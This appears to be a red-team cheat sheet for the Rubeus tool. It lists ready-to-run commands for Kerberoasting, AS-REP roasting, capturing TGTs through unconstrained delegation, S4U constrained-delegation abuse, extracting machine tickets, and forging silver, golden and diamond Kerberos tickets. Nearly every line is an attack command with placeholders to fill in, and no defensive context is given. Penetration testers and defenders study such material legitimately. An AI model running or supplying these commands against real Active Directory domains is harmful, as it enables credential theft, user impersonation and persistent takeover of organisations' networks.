Rubeus
Table of contents
- Kerberoast
- AS-REP Roasting
- Unconstrained delegation
- Get TGT from eKeys
- Get TGT from certificate
- Extract machine TGT
- Get TGS from TGT
- Generate Silver Ticket
- Generate Golden Ticket
- Generate Diamond Ticket
Kerberoast
All SPNs:
Rubeus.exe kerberoast /simple /nowrap
For a given SPN:
Rubeus.exe kerberoast /user:${SPN} /nowrap
AS-REP Roasting
Rubeus.exe asreproast /user:svc_oracle /nowrap
Unconstrained delegation
Monitor and extract TGT
Rubeus.exe monitor /targetuser:nlamb /interval:10
Get TGT from eKeys
Rubeus.exe asktgt /user:${machineAccount} /aes256:${aesKey} /opsec /nowrap
Get TGT from certificate
Rubeus.exe asktgt /user:${user} /certificate:${base64PFX} /password:${pfxPassword} /nowrap
Extract machine TGT
Rubeus.exe triage
Get TGS from TGT
Using TGT from Constrained Delegation
Rubeus.exe s4u /impersonateuser:${userToImpersonate} /msdsspn:${spnToImpersonate} /user:${principalAllowedToPerformDelegation} /ticket:${base64TGT} /nowrap
Use the /altservice:${serviceName} parameter to ask for a different service than the one described in the Constrained Delegation.
Generate Silver Ticket
Rubeus.exe silver /service:${service}/${machineDNS} /aes256:${computerKey} /user:${impersonatedUser} /domain:${domain} /sid:${userSID} /nowrap
Generate Golden Ticket
# Use the /sids parameter to add an extra SID for cross-domain tickets
Rubeus.exe golden /aes256:${krbtgtKey} /user:${impersonatedUser} /domain:${domain} /sid:${domainSID} /nowrap
Generate Diamond Ticket
# Use the /sids parameter to add an extra SID for cross-domain tickets
Rubeus.exe diamond /tgtdeleg /ticketuser:${impersonatedUser} /ticketuserid:${impersonatedUserRID} /groups:512 /krbkey:${krbtgtKey} /nowrap